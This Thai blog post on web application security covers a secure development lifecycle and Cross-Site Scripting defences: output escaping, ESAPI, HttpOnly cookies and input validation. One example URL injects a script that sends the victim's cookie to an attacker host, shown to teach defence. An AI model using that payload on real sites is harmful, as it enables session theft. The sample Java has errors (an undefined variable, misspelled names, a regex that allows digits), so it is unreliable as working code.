การมองเรื่องความปลอดภัยของ Web application เป็นเรื่องที่สำคัญ ในมุมนักพัฒนาคงไม่อาจบอกได้ว่ามันมี best pratice ที่จะจัดการทุกประเด็นที่เป็นจุดเสี่ยงจึงอาจบอกได้ว่า no silver bullet แต่ที่จะทำคือพยายามลดจุดอ่อนออกไปให้เหลือน้อยที่สุด และมันคงไม่สามารถทำให้สำเร็จได้ด้วยการให้ความสำคัญเพียงแต่การ coding เพราะถึงมี best pratice ดีแค่ไหนแต่มันก็เป็นเพียงการแก้ไขที่ปลายเหตุ เราควรมองและให้ความสำคัญมันตั้งแต่เริ่มต้นโปรเจค และใส่มันให้เป็นหนึ่งสิ่งที่จะต้องทำให้สำเร็จให้ได้
ถ้าเราให้ความสำคัญกับความปลอดภัยและขับเคลื่อนมันไปตั้งแต่เริ่มโปรเจคก็จะเป็นไปตามภาพดังนี้ (ภาพนี้ไม่ได้ตายตัว ยืดหยุ่นได้ตามสภาพแวดล้อมการทำงาน)
- Requirement
- Regulations
- Industry best practices
- Business requirement
- Architecture & Design
- Architecture Blueprint
- Application components
- Entry / Exit points
- External interface
- Data flow
- Threat Modeling
- Implementation
- Secure coding practices
- Testing & Deployment
- Penetration testing
- Security assessment
- Secure coding practices also involve in the testing stage
- Operation & Maintenance
- Security monitoring
- Recurring assessment
ในปีที่ผ่านมาจุดอ่อนที่มักถูกโจมตีดังนี้
- Injection
- Cross-Site Scripting (XSS)
- Broken Authentication and Session Management
- Insecure Direct Object References
- Cross-Site Request Forgery (CSRF)
- Security Misconfiguration
- Failure to Restrict URL Access
- Invalidated Redirects and Forwards
- Insecure Crytographic Storage
- Insufficient Transport Layer protection
แต่ผมจะพูดถึงจุดอ่อนที่พบกันมากที่สุด
Cross-Site Scripting
เป็นจุดอ่อนที่ส่งผลกระทบต่อผู้ใช้ web application เป็นจุดอ่อนที่เกิดขึ้นจากความไม่รอบคอบในขั้นตอนการ implement ส่งผลให้ผู้ไม่หวังดีสามารถ execute script บน browser ในฝั่งของผู้ใช้ได้ โดย script ดังนี้กล่าวจะถูกฉีคเข้ามาเพื่อไป execute บน browser ฝั่งผู้ใช้
XSS แบ่งได้เป็น 2 ประเภทตามวิธีที่ script ถูกส่งไปให้เหยื่อ
- Persistent XSS ผู้ไม่ประสงค์ดีสามารถส่ง script เข้าไปใน persistent storage เช่น database, file เมื่อผู้ใช้เข้าหน้าเวบที่ดึงข้อมูลใน persistent storage ดังกล่าวมาแสดง browser ก็จะ execute script นั้นโดยอัตโนมัติ
- Non-perssitent XSS คือ script ที่เป็นอันตรายไม่ได้ถูกเก็บลงใน web page หรือใน database ผู้โจมตีฉีค script เหล่านี้เข้ามาผ่นทาง URL ได้แล้ว execute script บน browser ของผู้ใช้ทั่วไปได้
ระดับความรุนแรงจะขึ้นอยู่กับ script ที่ผู้โจมตีเขียนขึ้นมาแต่โดยทั่วไปจะถูกกระทำดังนี้
- ขโมยข้อมูลส่วนตัว เช่น sessionID (cookie) หรือ browser history
- Redirect ไปยัง website ที่ผู้โจมตีเขียนขึ้นมารอไว้
- Compromise the operating system หรือ cause the Denial-of-Service (DoS)
- ใช้ browser ของเหยื่อเป็น backdoor เพื่อเข้าไปโจมตีเครื่องอื่นต่อไป
ตัวอย่าง code ที่มีช่องโหว่
<%
out.write("Message: " + request.getParameter("msg"));
%>
แล้วผู้ไม่หวังดีก็ใช้ url ลักษณะนี้เพื่อส่ง javascript เข้ามาทาง parameter
http://www.xxx.com/admin/message.jsp?msg=blah<script>document.location='http://www.attacker.com/cookie.cgi?'%20%2Bdocument.cookie</script>
แนวทางการป้องกัน
สามารถป้องกันได้สองวิธีคือ
- Output escaping strategy
- Input Validation strategy
Note:
Escaping เป็นเทคนิคที่ใช้เพื่อให้แน่ใจว่าข้อมูลผ่านการตรวจสอบแล้ว ไม่ใช่ข้อมูลที่ถูกนำไป interpreter ต่อได้ ซึ่งมีหลายเทคนิค (บางครั้งเราเรียกว่า endoding) โดยมีจุดประสงค์ที่แท้จริงคือเพื่อให้แน่ใจว่าข้อมูลที่ไม่ถูกต้องจะไม่สามารถถูกส่งเข้ามาเพื่อโจมตีได้
ตารางข้างล่างเป็นตัวอย่างของตัวอักษรที่ควรจะถูกขัดขวาง
Character | HTML Named Entity | HTML Hexadecimal Entity |
& | & | & |
< | < | < |
> | > | > |
" | " | " |
' | N/A (' is not recommended) | ' |
/ | / | / |
การ escape มีสองวิธีคือ
- html named entity เป็นตัวอักษรที่สอดคล้องกับชื่อ ที่ซึ่งได้กำหนดไว้ในมาตรฐาน HTML 4 ในรูปแบบ &name;
- html hexadecimal entity เป็นตัวอักษรที่แสดงเป็นเลขฐาน 16 ในรูปแบบ &#xHHHH;
Output escaping strategy
script ที่เป็นอันตรามักจะถูกฉีคเข้ามายังจุดที่อ่อนแอที่สุดในหน้าเว็บนั้น ซึ่งมันจะมีแตกต่างกันไปตามแต่ละส่วนของ html page ซึ่งจุดดังกล่าวได้แก่
- html element content
- จุดอ่อนแอที่อยู่ในส่วนของ HTML body ทั้งหมดเช่น <body>, <div>, <td> ...
- html common attribute
- เช่น <div attr=... ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE ...></div>
- html javascript data value
- เช่น <script> alert(' ... ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE ... ') </script>
- html style property value
- เช่น <style> selector{ property: ... ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE ...} </style>
- html url parameter value
- เช่น <a href="http://www.xxx.com?test=... ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE ..."></a>
<html>
<body>
<%
String username = request.getParameter("name");
out.write("Hello, " + htmlEntityEncode(username));
%>
</body>
</html>
Guideline function input escape
public static String htmlEntityEncode( String s ){
StringBuilder buf = new StringBuilder(s.length());
for ( int i = 0; i < len; i++ ){
char c = s.charAt( i );
if ( c>='a' && c<='z' || c>='A' && c<='Z' || c>='0' && c<='9' ) {
buf.append( c );
}
else {
buf.append("&#").append((int)c).append(";");
}
}
return buf.toString();
}
ลองดูแบบอื่นๆ ได้ที่ http://www.owasp.org/index.php/How_to_perform_HTML_entity_encoding_in_Java
หรือตัวอย่างการสร้าง HttpServletRequestWrapper ขึ้นมาเอง http://www.owasp.org/index.php/How_to_add_validation_logic_to_HttpServletRequestAPI อื่นๆ
- Jakarta Common Lang http://commons.apache.org/lang/
- jTidy http://jtidy.sourceforge.net/
- ESAPI http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Home (ไว้มีโอกาสจะมาพูดถึงอีกที)
ตัวอย่างการใช้งาน ESAPI
String safe = ESAPI.encoder().encodeForHTML(request.getParameter("input"));นอกจากนี้ยังมีอีกวิธีที่ช่วยลดจุดอ่อนลงได้คือการใช้ HTTPOnly cookie flag http://phamonyut.blogspot.com/2010/05/cookie-httponly-flag.html
Input Validation strategy
เป็นการ filter ข้อมูลที่รับเข้ามาจากผู้ใช้งาน ซึ่งการร้บข้อมูลแต่ละจุดจะมีการกำหนดว่ากรอกได้ตาม format อะไรบ้างตาม white-list ที่ออกแบบไว้ และก็มี blacklist ที่บอกว่าข้อมูลแบบไหนที่ไม่ควรนำเข้าระบบ แต่มันก็ไม่ได้ออกแบบไว้ให้เราทั้งหมด ดังนั้นจำเป็นต้องออกแบบเพิ่มเติมกันเองด้วย
กลุ่มข้อมูล input ที่จะเกี่ยวข้องกับ business logic
Field Name | Data Type | Length | Specific Requirement |
firstname | String | 1-20 | a-z, A-Z |
lastname | String | 1-40 | a-z, A-Z |
String | 8-50 | a-z, A-Z, 0-9, ., @ | |
username | String | 6-10 | a-z, A-Z, 0-9 |
password | String | 8-30 | a-z, A-Z, 0-9, !, @, #, $ |
zip | Integer | 5 | 0-9 |
notify | String | 2-3 | 'Yes', 'No' |
guideline function validate firstname ที่ใช้ regex
public boolean validateFirstname() {
boolean allOk = true;
if ("".equals(firstname)) {
error.put("firstname", "please enter your firstname");
firstname = "";
allOk = false;
} else {
Pattern p = Pattern.compile("^[\da-zA-Z]{1,20}$");
Matcher m = p.matcher(firstname);
if (!m.matchers()) {
errros.put("firstname", "firstname must contains character A-Z, a-z and has length between 1 to 20 only");
firstname = "";
allOk = false;
}
}
return allOk;
}
Credit by Phamonyut
No comments:
Post a Comment